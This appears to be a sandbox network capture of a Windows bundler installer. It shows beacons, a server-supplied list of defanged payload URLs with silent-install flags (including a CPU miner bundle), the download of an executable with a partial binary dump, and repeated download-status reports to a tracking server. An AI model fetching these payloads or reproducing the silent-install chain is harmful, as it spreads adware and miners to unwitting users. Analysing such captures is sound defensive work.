GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 7cg95osLL5z4DfX2gGVw4E9A19i6of3RrseV4p1UfGOZPhyxLZIMoI7hetPOskIW..x-amz-request-id: ABBF092CEF73FE0F..Date: Fri, 25 Sep 2015 20:58:24 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=360&n=install_browser_all_files_in_place&ibic=951432958192de010e9b45488dbf5014&rnd=1178 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: ETbCIvuD8UjYE0xZeD0tbQHzvmuKHcVa0avWQ0T56VW5p06p73E3904tGnYjGMBl

x-amz-request-id: FA7EE3D5977531CE

Date: Fri, 25 Sep 2015 20:58:27 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ETbCIvuD8UjYE0xZeD0tbQHzvmuKHcVa0avWQ0T56VW5p06p73E3904tGnYjGMBl..x-amz-request-id: FA7EE3D5977531CE..Date: Fri, 25 Sep 2015 20:58:27 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=410&n=install_browser_install_ch_success&ibic=951432958192de010e9b45488dbf5014&rnd=657 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: TAFU0CDeRM89pJ2JtvsNFoDgWSV3YFwvrv99YU7ezRhDkaT7GInjjZoCgDQjkSLi

x-amz-request-id: A0B545C5DC67D8D1

Date: Fri, 25 Sep 2015 20:58:38 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: TAFU0CDeRM89pJ2JtvsNFoDgWSV3YFwvrv99YU7ezRhDkaT7GInjjZoCgDQjkSLi..x-amz-request-id: A0B545C5DC67D8D1..Date: Fri, 25 Sep 2015 20:58:38 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=4&c=003266&i=480&n=install_browser_end_success&ibic=951432958192de010e9b45488dbf5014&rnd=3332 HTTP/1.1

Accept: */*

Host: err.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

x-amz-id-2: /gpA3VzNSrpSvLvkktkMvMeuNYZGSFK93/duG1P8exqBeHlxzP2LPa6eUEIr7NiS

x-amz-request-id: D5ED956112D1659E

Date: Fri, 25 Sep 2015 20:58:39 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: /gpA3VzNSrpSvLvkktkMvMeuNYZGSFK93/duG1P8exqBeHlxzP2LPa6eUEIr7NiS..x-amz-request-id: D5ED956112D1659E..Date: Fri, 25 Sep 2015 20:58:39 GMT..Expires: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalidate..Last-Modified: Wed, 17 Jun 2015 13:20:16 GMT..ETag: "28d6814f309ea289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Server: AmazonS3..GIF89a.............,...........D..;..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=142493&tag=RE_CLICKMEIN_INSTALL_INI HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Fri, 25 Sep 2015 20:59:01 GMT

Server: Apache/2.2.22 (Debian) mod_ssl/2.2.22 OpenSSL/1.0.1e mod_wsgi/3.3 Python/2.7.3 mod_perl/2.0.7 Perl/v5.14.2

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Fri, 25 Sep 15 20:59:00 GMT

Set-Cookie: _c4aid=F064099CEC1840E3A1022F24CE79668D; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=F064099CEC1840E3A1022F24CE79668D,1443214741.14756; expires=Wed, 23 Mar 16 20:59:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 142493);......0..

GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=0&sid=&isnw=7&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Fri, 25 Sep 2015 20:57:47 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.5.23

365..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 12216..hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe../VERYSILENT..hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe..http://d10huri5h4o4a3.cloudfront.net/policyname.exe.. /vpol=som..hXXp://www.codec13sudha.com/download.php?l4J9dw==..hXXp://download-servers.com/SysInfo/Validate.exe.. /s..hXXp://download-servers.com/anyprotect/nosig/AnyProtectSetup.exe../s..0..HTTP/1.1 200 OK..Server: nginx/1.6.3..Date: Fri, 25 Sep 2015 20:57:47 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.5.23..365..hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe.. /md=2 /v=som-tot-cpm-opw-crr..hXXp://livestatscounter.com/SysInfo/validator/timer.php..hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe.. q::cCnnykR3kEQycJE x#R3E#nqxkcn:x*:n*x:QcR#*D..hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe.. /ch=NOCHPC..hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe.. /ci 11612..http://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe.. /ci 1

<<< skipped >>>

GET /SysInfo/validator/timer.php HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: livestatscounter.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Server: nginx/1.6.3

Date: Fri, 25 Sep 2015 20:57:58 GMT

Content-Type: application/octet-stream

Content-Length: 165898

Connection: keep-alive

X-Powered-By: PHP/5.5.23

Content-Transfer-Encoding: binary

Content-Disposition: attachment; filename=CESwN2Es.exe

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^...........0.......p....@..........................P...............................................t.......@...............................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X\...........v..............@....ndata...P...............................rsrc........@.......z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.B..H.P.u..u..u...Hr@..B...SV.5p.B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 115

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:57:47 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 126

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:57:47 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:47 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:57:48 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:48 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 190

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:57:58 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 181

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:57:58 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:57:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 194

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://livestatscounter.com/SysInfo/validator/timer.php&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:09 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:09 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 183

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 196

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.staticclientstorage.com/69/all/cp/row/setup.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:21 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 189

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:23 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:23 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 202

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXps://s3.amazonaws.com/cf_vopackage/SysInfo/SearchUpdater.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:33 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:33 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:34 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:34 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d1mdi78qyff344.cloudfront.net/7121923af824073a25b2b7e6ba0a6e0e.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:44 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 187

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:44 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:44 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 200

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.software-forus.com/CPUminer/v6/Bundle_CPUminer.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:58:54 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:58:54 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 199

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:00 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:00 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 212

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://dl.taxideataxus.com/download/dwn/prq4633/este/re/setup_gmsd_re.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:10 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:10 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 170

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:11 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:11 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 183

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1723\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/smt.exe&errorlevel=0&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:21 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Fri, 25 Sep 2015 20:59:21 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}....

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 177

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://d10huri5h4o4a3.cloudfront.net/policyname.exe&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Fri, 25 Sep 2015 20:59:21 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

